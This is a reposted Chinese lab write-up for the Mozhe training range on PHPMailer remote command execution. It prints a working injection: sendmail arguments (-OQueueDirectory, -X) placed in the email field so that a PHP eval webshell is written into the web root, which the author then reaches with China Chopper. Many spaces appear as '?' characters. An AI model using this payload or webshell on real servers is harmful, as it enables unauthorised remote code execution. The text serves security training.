加入收藏 | 设为首页 | 会员中心 | 我要投稿 北几岛 (https://www.beijidao.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 大数据 > 正文

墨者 - PHPMailer远程命令执行漏洞溯源

发布时间:2021-07-06 04:17:36 所属栏目:大数据 来源: https://www.jb51.cc
导读:用bp抓包,发现与后台交互的文件 ? 构建email??? "aaa".?-OQueueDirectory=/tmp/.?-X/var/www/html/a.PHP?@ aaa.com ?? ? ? ? message??? ?PHP?@eval($_REQUEST[a]);? 访问a.PHP文件,上传成功 ? 菜刀无惧链接 ? 原理参考:https://www.anquanke.com/post/id/

用bp抓包,发现与后台交互的文件

?

构建email??? "aaa".?-OQueueDirectory=/tmp/.?-X/var/www/html/a.PHP?@ aaa.com ??

? ? ? message??? <?PHP?@eval($_REQUEST[a]);?>

访问a.PHP文件,上传成功

?

菜刀无惧链接

?

原理参考:https://www.anquanke.com/post/id/85295

? ? ? ? ? ? ? ? ??https://blog.csdn.net/wyvbboy/article/details/53969278

(编辑:北几岛)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
    相关内容
      推荐文章
        站长推荐
        热点阅读

          【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

          建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

          Copygight © 2008-2022 https://www.beijidao.com.cn/ All Rights Reserved. 北几岛